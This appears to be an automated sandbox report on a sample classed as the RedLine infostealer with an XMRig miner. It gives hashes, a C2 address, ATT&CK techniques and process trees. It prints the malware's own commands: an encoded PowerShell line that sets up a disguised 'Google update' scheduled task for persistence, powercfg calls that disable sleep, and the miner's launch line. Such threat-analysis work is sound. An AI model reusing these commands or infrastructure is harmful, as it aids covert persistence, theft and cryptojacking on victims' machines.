redline | 348754315241bc2b6627b015f97354701bf65255db2604b679dc4762f30c1da4

Analysis

max time kernel
300s
max time network
303s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
16-08-2022 22:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

348754315241bc2b6627b015f97354701bf65255db2604b679dc4762f30c1da4.exe
Size

12.6MB
MD5

b378f607d65dbbceded6f57aafd08629
SHA1

85c297246e6ef5d19b2b469783ecd5a13b217ac1
SHA256

348754315241bc2b6627b015f97354701bf65255db2604b679dc4762f30c1da4
SHA512

7a5b157f89ff3bb29be3b279e8645fd61acca9dec32537fb966ea2695a580d855618ec65b2e43576cb15ac61c90213f5dc68d5cb41c9af3b1b4da8514bc07748

Score

10^/10

redline xmrig 1137502411 infostealer miner spyware vmprotect

Malware Config

Extracted

Family

redline

Botnet

1137502411

193.124.22.27:8362

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/214644-212-0x000000000461973E-mapping.dmp	family_redline
behavioral2/memory/214644-250-0x0000000004600000-0x000000000461E000-memory.dmp	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/5428-667-0x000000014036EAC4-mapping.dmp	xmrig
behavioral2/memory/5428-673-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/5428-674-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig

Executes dropped EXE 3 IoCs

Processes:

Setup.exeWinRAR.exeupdater.exe

pid process

4900 Setup.exe
3500 WinRAR.exe
1376 updater.exe

VMProtect packed file 8 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Setup.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\Setup.exe	vmprotect
behavioral2/memory/4900-206-0x0000000000400000-0x0000000001407000-memory.dmp	vmprotect
behavioral2/memory/4900-313-0x0000000000400000-0x0000000001407000-memory.dmp	vmprotect
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe	vmprotect
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe	vmprotect
behavioral2/memory/1376-542-0x0000000000400000-0x0000000001407000-memory.dmp	vmprotect
behavioral2/memory/1376-642-0x0000000000400000-0x0000000001407000-memory.dmp	vmprotect

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Suspicious use of SetThreadContext 2 IoCs

Processes:

WinRAR.execonhost.exe

description	pid	process	target process
PID 3500 set thread context of 214644	3500	WinRAR.exe	AppLaunch.exe
PID 1348 set thread context of 5428	1348	conhost.exe	conhost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Setup.execonhost.exepowershell.exeAppLaunch.exeupdater.execonhost.execonhost.exe

pid	process
4900	Setup.exe
4900	Setup.exe
4284	conhost.exe
4616	powershell.exe
4616	powershell.exe
4616	powershell.exe
214644	AppLaunch.exe
214644	AppLaunch.exe
1376	updater.exe
1376	updater.exe
1348	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

AppLaunch.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	214644	AppLaunch.exe
Token: SeDebugPrivilege	4284	conhost.exe
Token: SeShutdownPrivilege	1724	powercfg.exe
Token: SeCreatePagefilePrivilege	1724	powercfg.exe
Token: SeShutdownPrivilege	3972	powercfg.exe
Token: SeCreatePagefilePrivilege	3972	powercfg.exe
Token: SeShutdownPrivilege	2308	powercfg.exe
Token: SeCreatePagefilePrivilege	2308	powercfg.exe
Token: SeShutdownPrivilege	4612	powercfg.exe
Token: SeCreatePagefilePrivilege	4612	powercfg.exe
Token: SeDebugPrivilege	4616	powershell.exe
Token: SeIncreaseQuotaPrivilege	4616	powershell.exe
Token: SeSecurityPrivilege	4616	powershell.exe
Token: SeTakeOwnershipPrivilege	4616	powershell.exe
Token: SeLoadDriverPrivilege	4616	powershell.exe
Token: SeSystemProfilePrivilege	4616	powershell.exe
Token: SeSystemtimePrivilege	4616	powershell.exe
Token: SeProfSingleProcessPrivilege	4616	powershell.exe
Token: SeIncBasePriorityPrivilege	4616	powershell.exe
Token: SeCreatePagefilePrivilege	4616	powershell.exe
Token: SeBackupPrivilege	4616	powershell.exe
Token: SeRestorePrivilege	4616	powershell.exe
Token: SeShutdownPrivilege	4616	powershell.exe
Token: SeDebugPrivilege	4616	powershell.exe
Token: SeSystemEnvironmentPrivilege	4616	powershell.exe
Token: SeRemoteShutdownPrivilege	4616	powershell.exe
Token: SeUndockPrivilege	4616	powershell.exe
Token: SeManageVolumePrivilege	4616	powershell.exe
Token: 33	4616	powershell.exe
Token: 34	4616	powershell.exe
Token: 35	4616	powershell.exe
Token: 36	4616	powershell.exe
Token: SeIncreaseQuotaPrivilege	4616	powershell.exe
Token: SeSecurityPrivilege	4616	powershell.exe
Token: SeTakeOwnershipPrivilege	4616	powershell.exe
Token: SeLoadDriverPrivilege	4616	powershell.exe
Token: SeSystemProfilePrivilege	4616	powershell.exe
Token: SeSystemtimePrivilege	4616	powershell.exe
Token: SeProfSingleProcessPrivilege	4616	powershell.exe
Token: SeIncBasePriorityPrivilege	4616	powershell.exe
Token: SeCreatePagefilePrivilege	4616	powershell.exe
Token: SeBackupPrivilege	4616	powershell.exe
Token: SeRestorePrivilege	4616	powershell.exe
Token: SeShutdownPrivilege	4616	powershell.exe
Token: SeDebugPrivilege	4616	powershell.exe
Token: SeSystemEnvironmentPrivilege	4616	powershell.exe
Token: SeRemoteShutdownPrivilege	4616	powershell.exe
Token: SeUndockPrivilege	4616	powershell.exe
Token: SeManageVolumePrivilege	4616	powershell.exe
Token: 33	4616	powershell.exe
Token: 34	4616	powershell.exe
Token: 35	4616	powershell.exe
Token: 36	4616	powershell.exe
Token: SeIncreaseQuotaPrivilege	4616	powershell.exe
Token: SeSecurityPrivilege	4616	powershell.exe
Token: SeTakeOwnershipPrivilege	4616	powershell.exe
Token: SeLoadDriverPrivilege	4616	powershell.exe
Token: SeSystemProfilePrivilege	4616	powershell.exe
Token: SeSystemtimePrivilege	4616	powershell.exe
Token: SeProfSingleProcessPrivilege	4616	powershell.exe
Token: SeIncBasePriorityPrivilege	4616	powershell.exe
Token: SeCreatePagefilePrivilege	4616	powershell.exe
Token: SeBackupPrivilege	4616	powershell.exe
Token: SeRestorePrivilege	4616	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

conhost.exe

pid	process
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

conhost.exe

pid	process
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe
5428	conhost.exe

Suspicious use of WriteProcessMemory 56 IoCs

Processes:

348754315241bc2b6627b015f97354701bf65255db2604b679dc4762f30c1da4.exeWinRAR.exeSetup.execonhost.execmd.exeupdater.execonhost.execmd.exe

description	pid	process	target process
PID 3528 wrote to memory of 4900	3528	348754315241bc2b6627b015f97354701bf65255db2604b679dc4762f30c1da4.exe	Setup.exe
PID 3528 wrote to memory of 4900	3528	348754315241bc2b6627b015f97354701bf65255db2604b679dc4762f30c1da4.exe	Setup.exe
PID 3528 wrote to memory of 3500	3528	348754315241bc2b6627b015f97354701bf65255db2604b679dc4762f30c1da4.exe	WinRAR.exe
PID 3528 wrote to memory of 3500	3528	348754315241bc2b6627b015f97354701bf65255db2604b679dc4762f30c1da4.exe	WinRAR.exe
PID 3528 wrote to memory of 3500	3528	348754315241bc2b6627b015f97354701bf65255db2604b679dc4762f30c1da4.exe	WinRAR.exe
PID 3500 wrote to memory of 214644	3500	WinRAR.exe	AppLaunch.exe
PID 3500 wrote to memory of 214644	3500	WinRAR.exe	AppLaunch.exe
PID 3500 wrote to memory of 214644	3500	WinRAR.exe	AppLaunch.exe
PID 3500 wrote to memory of 214644	3500	WinRAR.exe	AppLaunch.exe
PID 3500 wrote to memory of 214644	3500	WinRAR.exe	AppLaunch.exe
PID 4900 wrote to memory of 4284	4900	Setup.exe	conhost.exe
PID 4900 wrote to memory of 4284	4900	Setup.exe	conhost.exe
PID 4900 wrote to memory of 4284	4900	Setup.exe	conhost.exe
PID 4284 wrote to memory of 2268	4284	conhost.exe	cmd.exe
PID 4284 wrote to memory of 2268	4284	conhost.exe	cmd.exe
PID 2268 wrote to memory of 1724	2268	cmd.exe	powercfg.exe
PID 2268 wrote to memory of 1724	2268	cmd.exe	powercfg.exe
PID 2268 wrote to memory of 3972	2268	cmd.exe	powercfg.exe
PID 2268 wrote to memory of 3972	2268	cmd.exe	powercfg.exe
PID 2268 wrote to memory of 2308	2268	cmd.exe	powercfg.exe
PID 2268 wrote to memory of 2308	2268	cmd.exe	powercfg.exe
PID 2268 wrote to memory of 4612	2268	cmd.exe	powercfg.exe
PID 2268 wrote to memory of 4612	2268	cmd.exe	powercfg.exe
PID 4284 wrote to memory of 4616	4284	conhost.exe	powershell.exe
PID 4284 wrote to memory of 4616	4284	conhost.exe	powershell.exe
PID 1376 wrote to memory of 1348	1376	updater.exe	conhost.exe
PID 1376 wrote to memory of 1348	1376	updater.exe	conhost.exe
PID 1376 wrote to memory of 1348	1376	updater.exe	conhost.exe
PID 1348 wrote to memory of 5216	1348	conhost.exe	cmd.exe
PID 1348 wrote to memory of 5216	1348	conhost.exe	cmd.exe
PID 5216 wrote to memory of 5264	5216	cmd.exe	powercfg.exe
PID 5216 wrote to memory of 5264	5216	cmd.exe	powercfg.exe
PID 5216 wrote to memory of 5288	5216	cmd.exe	powercfg.exe
PID 5216 wrote to memory of 5288	5216	cmd.exe	powercfg.exe
PID 5216 wrote to memory of 5304	5216	cmd.exe	powercfg.exe
PID 5216 wrote to memory of 5304	5216	cmd.exe	powercfg.exe
PID 5216 wrote to memory of 5320	5216	cmd.exe	powercfg.exe
PID 5216 wrote to memory of 5320	5216	cmd.exe	powercfg.exe
PID 1348 wrote to memory of 5340	1348	conhost.exe	conhost.exe
PID 1348 wrote to memory of 5340	1348	conhost.exe	conhost.exe
PID 1348 wrote to memory of 5340	1348	conhost.exe	conhost.exe
PID 1348 wrote to memory of 5428	1348	conhost.exe	conhost.exe
PID 1348 wrote to memory of 5428	1348	conhost.exe	conhost.exe
PID 1348 wrote to memory of 5428	1348	conhost.exe	conhost.exe
PID 1348 wrote to memory of 5428	1348	conhost.exe	conhost.exe
PID 1348 wrote to memory of 5428	1348	conhost.exe	conhost.exe
PID 1348 wrote to memory of 5428	1348	conhost.exe	conhost.exe
PID 1348 wrote to memory of 5428	1348	conhost.exe	conhost.exe
PID 1348 wrote to memory of 5428	1348	conhost.exe	conhost.exe
PID 1348 wrote to memory of 5428	1348	conhost.exe	conhost.exe
PID 1348 wrote to memory of 5428	1348	conhost.exe	conhost.exe
PID 1348 wrote to memory of 5428	1348	conhost.exe	conhost.exe
PID 1348 wrote to memory of 5428	1348	conhost.exe	conhost.exe
PID 1348 wrote to memory of 5428	1348	conhost.exe	conhost.exe
PID 1348 wrote to memory of 5428	1348	conhost.exe	conhost.exe
PID 1348 wrote to memory of 5428	1348	conhost.exe	conhost.exe

C:\Users\Admin\AppData\Local\Temp\348754315241bc2b6627b015f97354701bf65255db2604b679dc4762f30c1da4.exe
"C:\Users\Admin\AppData\Local\Temp\348754315241bc2b6627b015f97354701bf65255db2604b679dc4762f30c1da4.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3528

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4900

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4284

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:2268

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1724

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3972

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2308

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AaABnACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACIAJwApACAAPAAjAGIAbwBwAGUAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AEwAbwBnAE8AbgApACAAPAAjAGcAagAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGwAYwAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnACAAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAbQBpAHkAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABTAGUAdAB1AHAALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACAALQBGAG8AcgBjAGUAIAA8ACMAaAB0ACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBzAHMAbQB4ACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4616

C:\Users\Admin\AppData\Local\Temp\WinRAR.exe
"C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3500

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:214644

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1376

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1348

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:5216

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
PID:5264

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
PID:5288

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
PID:5304

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
PID:5320

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "uvesggrkm"
3⤵
PID:5340

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe hcjacfutt1 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvtFmxXu9Su4ZmZ4m248qJKzsLeDyUrDdhyyDVQTNK7Lb4a2q19DoArOpdShFBNau9Recj546kWdVptn5OK/tXtkgn0ruIhg/KjPhxMJcycaR1L4q/jKOAXeFXbvVng8sWBXr5QC+wa7wAgzHC51Zgfpl3EEoTMsShWvOKvqjI+T8TySZJmhNA4qofmRL7qhAQWNqdKyVFvAnKOiWcQ2UhHTpPkIzBadJNrqRVYvRAzPGZzobXL63bcNrQrSmKoOfFbVvAtKLGmaUpRVCZeTu4w+eNrdDEUMakdmHEToJpiVl80Hpesxs8ZcdgUUuTXgrp2UaGX7eS0pgn0dGu9npz6EfhQETZeMmop4CA5xC2AcGTtniNQ9SPWVmGNYhabXxgyp0y8XyXKCpeEwn6XwU8vGzI+GNi9GwV7/S4VnYZKv7a/XXYo+XAOGxbXcHwNJnjcFoj4xWrvAlG+IpQqBQaHnUuFGSCDHNJsbMRvwZQGAQssm+B2u6vlnQbTniqtiZ5o=
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5428

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
Filesize
642B

MD5
91da0e0d6c73120560eafe3fb0a762fa

SHA1
450b05f8ca5afb737da4312cf7d1603e695ec136

SHA256
bbb62e473ac1b24a55b9fca67848cebc87764d47a6bf60f51d85ed6de28575d1

SHA512
05fb7457b58d099581121c9afc361543a5d2d4b3444994be5cf6a36b3010a76a13310698f77452e2921dc6d1ac511240d95588030a5983eaee7899b625f4e11a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Setup.exe
Filesize
8.9MB

MD5
b7074a22f94e2e999c94115d796ced85

SHA1
d22f7c645b313c9d3fbedc224519a0290b8acf06

SHA256
9b44f69d5c04811aa7be030ebd6092478726a802c72e85ee29a48904f7e4aa62

SHA512
b141c66576e9dde48f967728adc6adc826f1a2116dd2ff63691901f9dc49b64e1098f0f9dfe70ff71bd98be8a98ef827df30fec9a1822467e2340740420e7458

Download Submit
C:\Users\Admin\AppData\Local\Temp\Setup.exe
Filesize
8.9MB

MD5
b7074a22f94e2e999c94115d796ced85

SHA1
d22f7c645b313c9d3fbedc224519a0290b8acf06

SHA256
9b44f69d5c04811aa7be030ebd6092478726a802c72e85ee29a48904f7e4aa62

SHA512
b141c66576e9dde48f967728adc6adc826f1a2116dd2ff63691901f9dc49b64e1098f0f9dfe70ff71bd98be8a98ef827df30fec9a1822467e2340740420e7458

Download Submit
C:\Users\Admin\AppData\Local\Temp\WinRAR.exe
Filesize
3.9MB

MD5
2d9004e052de0c1bcd1bce358ae8f093

SHA1
f230f637af3fcc91c37bbc25c81687578b3cd1df

SHA256
59658452e0567e4f3a409f88345654fc4fca929bc90f219c0659492062096376

SHA512
9cc391fc327d6d91d03475015e6e50cbd14680bb8f08d7f77bfd04b63ad321527631c06d0ac7501056a8b01ddadb93b1688ec7a48db183e5f7799a598c99a8ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\WinRAR.exe
Filesize
3.9MB

MD5
2d9004e052de0c1bcd1bce358ae8f093

SHA1
f230f637af3fcc91c37bbc25c81687578b3cd1df

SHA256
59658452e0567e4f3a409f88345654fc4fca929bc90f219c0659492062096376

SHA512
9cc391fc327d6d91d03475015e6e50cbd14680bb8f08d7f77bfd04b63ad321527631c06d0ac7501056a8b01ddadb93b1688ec7a48db183e5f7799a598c99a8ca

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Filesize
8.9MB

MD5
b7074a22f94e2e999c94115d796ced85

SHA1
d22f7c645b313c9d3fbedc224519a0290b8acf06

SHA256
9b44f69d5c04811aa7be030ebd6092478726a802c72e85ee29a48904f7e4aa62

SHA512
b141c66576e9dde48f967728adc6adc826f1a2116dd2ff63691901f9dc49b64e1098f0f9dfe70ff71bd98be8a98ef827df30fec9a1822467e2340740420e7458

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Filesize
8.9MB

MD5
b7074a22f94e2e999c94115d796ced85

SHA1
d22f7c645b313c9d3fbedc224519a0290b8acf06

SHA256
9b44f69d5c04811aa7be030ebd6092478726a802c72e85ee29a48904f7e4aa62

SHA512
b141c66576e9dde48f967728adc6adc826f1a2116dd2ff63691901f9dc49b64e1098f0f9dfe70ff71bd98be8a98ef827df30fec9a1822467e2340740420e7458

Download Submit
memory/1348-658-0x0000028F0EA00000-0x0000028F0EA12000-memory.dmp

Filesize
72KB

Download
memory/1348-657-0x0000028F0E9D0000-0x0000028F0E9D6000-memory.dmp

Filesize
24KB

Download
memory/1376-642-0x0000000000400000-0x0000000001407000-memory.dmp

Filesize
16.0MB

Download
memory/1376-542-0x0000000000400000-0x0000000001407000-memory.dmp

Filesize
16.0MB

Download
memory/1724-333-0x0000000000000000-mapping.dmp

Download
memory/2268-329-0x0000000000000000-mapping.dmp

Download
memory/2308-336-0x0000000000000000-mapping.dmp

Download
memory/3500-188-0x0000000000000000-mapping.dmp

Download
memory/3528-176-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/3528-135-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/3528-137-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/3528-138-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/3528-139-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/3528-140-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/3528-141-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/3528-142-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/3528-143-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/3528-144-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/3528-145-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/3528-146-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/3528-147-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/3528-148-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/3528-149-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/3528-150-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/3528-152-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/3528-151-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/3528-153-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/3528-154-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/3528-155-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
memory/3528-156-0x0000000077550000-0x00000000776DE000-memory.dmp

Filesize
1.6MB

Download
